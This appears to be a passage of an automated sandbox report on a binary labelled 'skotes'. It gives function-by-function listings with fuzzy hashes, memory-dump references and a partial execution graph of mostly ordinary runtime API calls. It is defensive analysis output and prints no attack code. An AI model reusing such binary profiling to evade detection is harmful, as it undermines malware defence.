                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f38aeab7d66bf73b3eced6fbc93be1ba57d909b8176af47aeb1baf8d7470d982
                                                        • Instruction ID: 17efdc7f931146205f1987d507e2e666247e67ef81801d5c57a4b9fa2cd454bb
                                                        • Opcode Fuzzy Hash: f38aeab7d66bf73b3eced6fbc93be1ba57d909b8176af47aeb1baf8d7470d982
                                                        • Instruction Fuzzy Hash: E8118A33F30C295B675C816D8C172BA95D2EBD825071F933AD826E7284E994DE13D2D0
                                                        Function 00DF8860 Relevance: .1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                        • Instruction ID: 4d54053b3463a0e35693c42b77bbb16957e63a3ade7feeb1d1304b60ddf4421f
                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                        • Instruction Fuzzy Hash: 3E115E7720018943E608863DF8B45B7A795EBC53617AFC376C3424B744CA22D841B522
                                                        Function 00DE652B Relevance: .0, Instructions: 24COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 720c9c7e5c62fbb1d366e98acc96df1bcb897b45da37e20ade915127655bda91
                                                        • Instruction ID: cab07470130a9a92aa3a918363a6ff2ac4fd2eb18ca8ea2c2b75c5e7eb447aae
                                                        • Opcode Fuzzy Hash: 720c9c7e5c62fbb1d366e98acc96df1bcb897b45da37e20ade915127655bda91
                                                        • Instruction Fuzzy Hash: 36E08C30240188AECE357B19C85DA4C3B69EB66781F144814FD184A222CB25EE92CAA1
                                                        Function 00DEA302 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                        • Instruction ID: d09b47174d6fcd08ba82eba3ca1dd14e09fec4c38e41e01d0c2c8bf8b2246217
                                                        • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                        • Instruction Fuzzy Hash: C5E08C32921268EBCB14EBDDC90499AF3ECEB49B10B650096F601D3150C270EE00CBF0
                                                        Function 00DB2EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                        • String ID:
                                                        • API String ID: 57040152-0
                                                        • Opcode ID: 77795fbb7c8fbb19e358dc981fd8423d1807a538004640745be22df7b28a7342
                                                        • Instruction ID: acb4e2962acff0d2cca3b3a681b12a824e1d6fdfc3c128ab6d9e33a20055f3c9
                                                        • Opcode Fuzzy Hash: 77795fbb7c8fbb19e358dc981fd8423d1807a538004640745be22df7b28a7342
                                                        • Instruction Fuzzy Hash: 55A1F371A01306DFDB10DFA9C944BAAB7A8FF15354F08812DE91AD7241EB31EA04DBB1
                                                        Function 00DE4840 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _ValidateLocalCookies.LIBCMT ref: 00DE4877
                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00DE487F
                                                        • _ValidateLocalCookies.LIBCMT ref: 00DE4908
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00DE4933
                                                        • _ValidateLocalCookies.LIBCMT ref: 00DE4988
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                        • String ID: csm
                                                        • API String ID: 1170836740-1018135373
                                                        • Opcode ID: 2f101821e0fc3eb1afb4d202ad923a23265729fdcfac28124c3b4d365169aa1b
                                                        • Instruction ID: bd330311a09a2f8cfee11ca74e997b1d72022a3089612fea3cc5cda48c8d58c8
                                                        • Opcode Fuzzy Hash: 2f101821e0fc3eb1afb4d202ad923a23265729fdcfac28124c3b4d365169aa1b
                                                        • Instruction Fuzzy Hash: 4B51E8349002889BCF10EF6ADC84AAF7BA5EF45318F188159E918AB352D732DD55CFB1
                                                        Function 00DEF35F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ___free_lconv_mon
                                                        • String ID: 8"$`'$x!
                                                        • API String ID: 3903695350-873893488
                                                        • Opcode ID: 751087124621ac45f214603735af1908f32abcd56a4569a668932aa88d8e1dd5
                                                        • Instruction ID: 792facf03b8a3e5463cbfcb8e059b83698e0da6566cca5f3a09bf5beca485ddc
                                                        • Opcode Fuzzy Hash: 751087124621ac45f214603735af1908f32abcd56a4569a668932aa88d8e1dd5
                                                        • Instruction Fuzzy Hash: 24311732600786DFEB21BB3ADC45B5B73E9FF40352F18482AE459D6595EE71A8808A31
                                                        Function 00DECBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _strrchr
                                                        • String ID:
                                                        • API String ID: 3213747228-0
                                                        • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                        • Instruction ID: 13e0ff13a0cd0fd34c32c01703efb2391ebdee6f1db8b5ab274d5c2aa786249e
                                                        • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                        • Instruction Fuzzy Hash: 25B125329102C59FDB15EF2AC8817BEBBE5EF45340F28916AE855EB241D6359D03CB70
                                                        Function 00DCBB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Xtime_diff_to_millis2_xtime_get
                                                        • String ID:
                                                        • API String ID: 531285432-0
                                                        • Opcode ID: f59446fda54c541b4362009875b4e9c21862ab6836564e3b0fc329e7b51aa8b4
                                                        • Instruction ID: 3b04473f7fdf5d9ede2c133c4d8006566643aba28569872e118e4fc8f6d5a3cb
                                                        • Opcode Fuzzy Hash: f59446fda54c541b4362009875b4e9c21862ab6836564e3b0fc329e7b51aa8b4
                                                        • Instruction Fuzzy Hash: 62210C71A1111AAFDF01EBA4D982EBEB7B9EF08710F10505EF605B7261DB209D419BB1
                                                        Function 00DBE360 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00DBE4F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Xinvalid_argumentstd::_
                                                        • String ID: L1$invalid stoi argument
                                                        • API String ID: 909987262-3568411768
                                                        • Opcode ID: 6f7873deff0b40d62c29fb6f54cbf6b0b579c2ceffd1b971d79707c5007387c9
                                                        • Instruction ID: 23b1f17c466a394e2a0330829187fc43e88c5aede6fd9506b11f22443eae2a2d
                                                        • Opcode Fuzzy Hash: 6f7873deff0b40d62c29fb6f54cbf6b0b579c2ceffd1b971d79707c5007387c9
                                                        • Instruction Fuzzy Hash: D5F09671905310AFD734AF699C02ADB73E8EB49710F154825FD29A3252DB70A944C6F3

                                                        Execution Graph

                                                        Execution Coverage:1.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:4%
                                                        Total number of Nodes:1236
                                                        Total number of Limit Nodes:33
                                                        execution_graph 94887 dff7bf 94888 dffcb6 94887->94888 94889 dff7d3 94887->94889 94988 dfaceb 94888->94988 94891 dffcc2 94889->94891 94922 e0fddb 94889->94922 94893 dfaceb 23 API calls 94891->94893 94895 dffd3d 94893->94895 94894 dff7e5 94894->94891 94894->94895 94896 dff83e 94894->94896 94998 e61155 22 API calls 94895->94998 94915 dfed9d ISource 94896->94915 94932 e01310 94896->94932 94899 e44beb 95004 e6359c 82 API calls __wsopen_s 94899->95004 94900 dffef7 94900->94915 95000 dfa8c7 22 API calls __fread_nolock 94900->95000 94902 dfec76 ISource 94902->94899 94902->94900 94903 dff3ae ISource 94902->94903 94905 e0fddb 22 API calls 94902->94905 94906 e44600 94902->94906 94907 e44b0b 94902->94907 94913 e10242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94902->94913 94914 dfa8c7 22 API calls 94902->94914 94902->94915 94916 dfa961 22 API calls 94902->94916 94917 dffbe3 94902->94917 94920 e101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 94902->94920 94921 e100a3 29 API calls pre_c_initialization 94902->94921 94986 e001e0 181 API calls 2 library calls 94902->94986 94987 e006a0 41 API calls ISource 94902->94987 94903->94915 95001 e6359c 82 API calls __wsopen_s 94903->95001 94905->94902 94906->94915 94999 dfa8c7 22 API calls __fread_nolock 94906->94999 95002 e6359c 82 API calls __wsopen_s 94907->95002 94913->94902 94914->94902 94916->94902 94917->94903 94917->94915 94918 e44bdc 94917->94918 95003 e6359c 82 API calls __wsopen_s 94918->95003 94920->94902 94921->94902 94924 e0fde0 94922->94924 94925 e0fdfa 94924->94925 94928 e0fdfc 94924->94928 95005 e1ea0c 94924->95005 95012 e14ead 7 API calls 2 library calls 94924->95012 94925->94894 94927 e1066d 95014 e132a4 RaiseException 94927->95014 94928->94927 95013 e132a4 RaiseException 94928->95013 94930 e1068a 94930->94894 94933 e017b0 94932->94933 94934 e01376 94932->94934 95078 e10242 5 API calls __Init_thread_wait 94933->95078 94935 e01390 94934->94935 94936 e46331 94934->94936 95017 e01940 94935->95017 95088 e7709c 181 API calls 94936->95088 94940 e017ba 94947 e017fb 94940->94947 95079 df9cb3 94940->95079 94942 e4633d 94942->94902 94944 e01940 9 API calls 94945 e013b6 94944->94945 94945->94947 94948 e013ec 94945->94948 94946 e46346 95089 e6359c 82 API calls __wsopen_s 94946->95089 94947->94946 94949 e0182c 94947->94949 94948->94946 94972 e01408 __fread_nolock 94948->94972 94951 dfaceb 23 API calls 94949->94951 94954 e01839 94951->94954 94952 e017d4 95085 e101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94952->95085 95086 e0d217 181 API calls 94954->95086 94956 e4636e 95090 e6359c 82 API calls __wsopen_s 94956->95090 94957 e0152f 94959 e463d1 94957->94959 94960 e0153c 94957->94960 95092 e75745 54 API calls _wcslen 94959->95092 94962 e01940 9 API calls 94960->94962 94963 e01549 94962->94963 94967 e464fa 94963->94967 94969 e01940 9 API calls 94963->94969 94964 e0fddb 22 API calls 94964->94972 94965 e01872 95087 e0faeb 23 API calls 94965->95087 94976 e46369 94967->94976 95094 e6359c 82 API calls __wsopen_s 94967->95094 94974 e01563 94969->94974 94972->94954 94972->94956 94972->94957 94972->94964 94973 e463b2 94972->94973 94972->94976 95043 e0fe0b 94972->95043 95053 dfec40 94972->95053 95091 e6359c 82 API calls __wsopen_s 94973->95091 94974->94967 94979 e015c7 ISource 94974->94979 95093 dfa8c7 22 API calls __fread_nolock 94974->95093 94976->94902 94978 e01940 9 API calls 94978->94979 94979->94965 94979->94967 94979->94976 94979->94978 94982 e0167b ISource 94979->94982 95027 e0f645 94979->95027 95034 e81591 94979->95034 95037 e8150e 94979->95037 94980 e0171d 94980->94902 94982->94980 95077 e0ce17 22 API calls ISource 94982->95077 94986->94902 94987->94902 94989 dfacf9 94988->94989 94997 dfad2a ISource 94988->94997 94990 dfad55 94989->94990 94992 dfad01 ISource 94989->94992 94990->94997 95161 dfa8c7 22 API calls __fread_nolock 94990->95161 94993 e3fa48 94992->94993 94994 dfad21 94992->94994 94992->94997 94993->94997 95162 e0ce17 22 API calls ISource 94993->95162 94995 e3fa3a VariantClear 94994->94995 94994->94997 94995->94997 94997->94891 94998->94915 94999->94915 95000->94915 95001->94915 95002->94915 95003->94899 95004->94915 95010 e23820 _abort 95005->95010 95006 e2385e 95016 e1f2d9 20 API calls _abort 95006->95016 95008 e23849 RtlAllocateHeap 95009 e2385c 95008->95009 95008->95010 95009->94924 95010->95006 95010->95008 95015 e14ead 7 API calls 2 library calls 95010->95015 95012->94924 95013->94927 95014->94930 95015->95010 95016->95009 95018 e01981 95017->95018 95019 e0195d 95017->95019 95095 e10242 5 API calls __Init_thread_wait 95018->95095 95026 e013a0 95019->95026 95097 e10242 5 API calls __Init_thread_wait 95019->95097 95021 e0198b 95021->95019 95096 e101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95021->95096 95024 e08727 95024->95026 95098 e101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95024->95098 95026->94944 95099 dfb567 95027->95099 95029 e0f659 95030 e0f661 timeGetTime 95029->95030 95031 e4f2dc Sleep 95029->95031 95032 dfb567 39 API calls 95030->95032 95033 e0f677 95032->95033 95033->94979 95105 e82ad8 95034->95105 95036 e8159f 95036->94979 95038 e82ad8 54 API calls 95037->95038 95039 e8151c 95038->95039 95040 e8156b PostMessageW 95039->95040 95042 e81529 95039->95042 95140 e5e97b 95040->95140 95042->94979 95045 e0fddb 95043->95045 95044 e1ea0c ___std_exception_copy 21 API calls 95044->95045 95045->95044 95046 